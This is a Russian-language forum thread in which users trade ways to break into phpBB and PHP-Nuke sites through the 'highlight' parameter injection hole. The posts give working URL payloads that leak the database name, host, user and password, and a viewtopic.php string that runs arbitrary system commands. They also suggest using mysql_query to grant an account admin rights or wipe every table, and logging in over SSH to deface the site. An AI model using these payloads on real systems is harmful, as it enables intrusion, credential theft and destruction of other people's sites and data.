Зашёл на портал на движке phpпуке Допустим www.mega-lol.net Стырил пароль от базы и имя &highlight=%2527.$poster=$dbpass.%2527 &highlight=%2527.$poster=$dbname.%2527 Как мне быть дальше?
Так. Серьезно. Ответь, сколько ты куриш? Ты зря этим делом занимаешься, если бы не курил ПЛАН, знал бы что highlight в phpBB )) Если ты там стырил пас от MySQL, то теперь делай так Напиши его в блокнот Закрой блокнот Не сохраняй изменения Забей на пароль Теперь используй сплойт чтобы выполнить произвольные комманды на уязвимой с-ме!)) Уже писал МИЛИОН раз про highlight. И ещё напишу viewtopic.php?xxx=uname -a&t=[TOPIC]&highlight=%2527.system($_GET[xxx]).include%2527 Незабудь вместо [TOPIC] поставить номер топика
xxx - это параметр в строке в который нужно писать команду, ее запустит system() uname - это команда nix показывающая версию ОС и другое. с параметром a - версию Linux
Ребята прошу вас объясните мне ламеру, как нужнно взламывать сайты на Phpnuke. как ни стараюсь не получается. прошу вас помггите.
1. ага... сейчас остались критические уязвимости в нюке 7,5 7,6 ? На секьюрити только XSS и то херь 2. 2KEZ, При создании нюка создаётся профиль базового админа форума (редактирование его параметров запрещено) Всё его данные находятся в бд определённой яцейке (название непоню сейчас точно) Можно ли с помощью &highlight=%2527.system($_GET[xxx]).include%2527 Очистить данные этой ячейки, тем самым введя supersite.ru/admin.pnp создать по новой базового администратора? Danke... =)
Какие ячейки? Я тебе про ПЛАН говорил? )) Ладно шучу )) Вообщем если у тебя есть шелл (HTTP) я незнаю о каких админах ты можешь говорить... Ты можешь например делать вместо system($_GET[xxx]) mysql_query($_GET[xxx]) и вместо xxx писать SQL команды Например UPDATE phpbb_users SET user_level=1 WHERE user_id=[ТВОЙ ID] Или стереть все таблицы... А phpNuke ТУТ ВООБЩЕ НЕ ПРИ ЧЕМ. Разве что phpBB бывает модулем в нюке.
так.... видать на вопрос не ответили ему =)) &highlight=%2527.$poster=$dbname.%2527 &highlight=%2527.$poster=$dbpass.%2527 ничего полезного тебе НЕ ДАЮТ !!!! набери &highlight=%2527.$poster=$dbhost.%2527 еси там будет localhost, смело забивай на это дело... а так те надо набрать: &highlight=%2527.$poster=$dbuser.%2527 &highlight=%2527.$poster=$dbpasswd.%2527 это тебе даст логин и пароль от БД !!! далее конектишься по SSH туда и всего делов.. считай сайт взломан =)) (у меня через это был первый дефейс )
